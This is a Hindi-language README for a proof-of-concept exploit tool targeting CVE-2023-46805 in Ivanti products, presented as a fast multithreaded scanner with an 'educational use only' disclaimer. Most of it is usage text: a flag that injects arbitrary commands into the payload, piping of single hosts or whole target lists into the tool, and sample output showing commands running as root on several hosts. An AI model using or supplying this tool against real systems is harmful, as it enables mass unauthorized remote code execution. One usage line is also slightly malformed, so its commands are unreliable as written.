
CVE-2023-46805 Ivanti POC RCE - अल्ट्रा फास्ट स्कैनर।
शीर्षक: CVE-2023-46805 के लिए प्रूफ ऑफ कॉन्सेप्ट - केवल शैक्षिक उपयोग के लिए
लाइसेंस: यह कार्य क्रिएटिव कॉमन्स एट्रिब्यूशन 4.0 अंतर्राष्ट्रीय लाइसेंस (CC BY 4.0) के अंतर्गत रखा गया है। आप इस कार्य को साझा करने, कॉपी करने, वितरित करने और प्रसारित करने, इसे अनुकूलित करने या अन्य उद्देश्यों के लिए उपयोग करने के लिए स्वतंत्र हैं, बशर्ते कि लेखकत्व का उचित श्रेय दिया जाए।
अस्वीकरण: यह प्रूफ ऑफ कॉन्सेप्ट (PoC) केवल शैक्षिक और साइबर सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। लेखक, संबद्ध संगठन, या इस सामग्री के निर्माण, उत्पादन या वितरण में शामिल कोई भी अन्य पक्ष इस सामग्री के उपयोग या उपयोग करने में असमर्थता से उत्पन्न होने वाले किसी भी नुकसान के लिए उत्तरदायी नहीं होगा, जिसमें प्रत्यक्ष, अप्रत्यक्ष, आकस्मिक, विशेष, परिणामी या दंडात्मक क्षति शामिल है, लेकिन इन्हीं तक सीमित नहीं है।
शैक्षिक उद्देश्य: इस PoC का उद्देश्य साइबर सुरक्षा समुदाय को CVE-2023-46805 के रूप में पहचानी गई कमजोरी को समझने और कम करने में सहायता करना है। इसका उपयोग उत्पादन वातावरण या दुर्भावनापूर्ण गतिविधियों के लिए नहीं किया जाना चाहिए।
कमजोरी का विवरण: Ivanti RCE
PoC विवरण:
Usage of ./CVE-Ivanti:
-cmd string
The command to replace 'id' in the payload (default "id")
-t int
Number of concurrent threads (default 5)
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'